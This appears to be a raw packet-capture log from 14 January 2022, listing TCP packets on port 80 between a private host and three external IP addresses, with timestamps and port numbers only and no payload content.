Jan 14, 2022 00:16:14.749699116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.749840975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.749950886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.750061035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.750179052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.750318050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.750437975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.757339001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.757781029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.757888079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.757993937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.758090973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.758202076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.758302927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.758413076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.758512974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.758620977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.758724928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.758827925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.758932114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759038925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759134054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759237051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759335995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759434938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759533882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759640932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759747982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759846926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.759946108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760045052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760143995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760243893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760341883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760453939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760541916 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.760556936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760658026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760757923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760857105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.760957003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.761056900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.761163950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.761265993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.761363029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.761461020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.761564016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.761672974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.761833906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.761953115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.762058020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.762168884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.762284994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.762393951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.762509108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.762617111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.762747049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.762856007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.762955904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.763065100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.763169050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.763274908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.763375998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.763477087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.763586044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.763721943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.763834953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.763952971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.764070988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.764183998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.764292955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.764405012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.764517069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.764626026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.764748096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.764862061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.764982939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.765084982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.765197992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.765305042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.765415907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.765528917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.765798092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.765924931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.766103029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.766201973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.766298056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.766401052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.766494989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.766587973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.766694069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.766798973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.766906023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.767009020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.767106056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.767205000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.767307997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.767406940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.767513037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.767621040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.770689964 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.770715952 CET	80	49919	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.770823956 CET	49919	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.770989895 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.771428108 CET	80	49923	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.771508932 CET	49923	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.772272110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.772290945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.772341967 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.772375107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.772465944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.772569895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.772658110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.772806883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.772921085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.773030996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.773132086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.773231030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.773332119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.773425102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.777014017 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.777036905 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.777053118 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.777602911 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.777606964 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.777741909 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.777997017 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.779429913 CET	80	49922	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:14.781972885 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782000065 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782020092 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782043934 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782064915 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782082081 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782087088 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782111883 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782124043 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782135010 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782160044 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782161951 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782203913 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782223940 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782227039 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782253027 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782264948 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782299042 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782306910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782324076 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782336950 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782356024 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782380104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782387972 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782402992 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782426119 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782443047 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782449007 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782457113 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782495022 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782509089 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782535076 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782552958 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782571077 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782593966 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782599926 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782617092 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.782628059 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.782685995 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.783829927 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.783862114 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.783885002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.783906937 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.783927917 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.783929110 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.783951998 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.783967018 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.783974886 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.783998013 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784018993 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784019947 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784037113 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784043074 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784066916 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784090042 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784092903 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784113884 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784132957 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784136057 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784159899 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784183025 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784204960 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784207106 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784228086 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784245014 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784252882 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784276009 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784286976 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784296989 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784320116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784342051 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784358978 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784363031 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784384966 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784408092 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784408092 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784430027 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784431934 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784451962 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784472942 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784476042 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784498930 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784503937 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784519911 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784544945 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784557104 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784565926 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784588099 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784607887 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784615040 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784630060 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784651041 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784651995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784674883 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.784694910 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.784745932 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.786603928 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.789892912 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.797969103 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.806334972 CET	80	49922	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:14.806432962 CET	49922	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.806627989 CET	49922	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.816554070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.816922903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.817186117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.817410946 CET	49923	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.817445040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.817610979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.817733049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.817842007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.817950964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.818053961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.818165064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.818269968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.818386078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.818495989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.818604946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.818711042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.818840027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.818960905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.819076061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.819181919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.819308043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.819413900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.819518089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.819632053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.819752932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.819873095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.819998026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.820122004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.820228100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.820363045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.820460081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.820566893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.820669889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.820791960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.820888042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.820992947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.821094036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.821193933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.821309090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.821409941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.821506023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.821623087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.821754932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.821868896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.821975946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.822091103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.822196960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.822304964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.822411060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.822518110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.822633982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.822776079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.822895050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.823020935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.823143005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.823255062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.823362112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.823472977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.823586941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.823698044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.823816061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.823921919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.824032068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.824137926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.824242115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.824359894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.824459076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.824564934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.824665070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.824795008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.824902058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.825009108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.825117111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.825222969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.825333118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.825439930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.825544119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.825654984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.825782061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.825890064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826003075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826103926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826205969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826308966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826410055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826510906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826615095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826726913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826834917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.826935053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827035904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827137947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827236891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827338934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827440023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827539921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827644110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827755928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827877998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.827986002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.828094006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.839812994 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.840534925 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.840616941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.848685026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.848820925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.848932981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.849045992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.849153042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.849261999 CET	49902	80	192.168.2.4	185.215.113.35
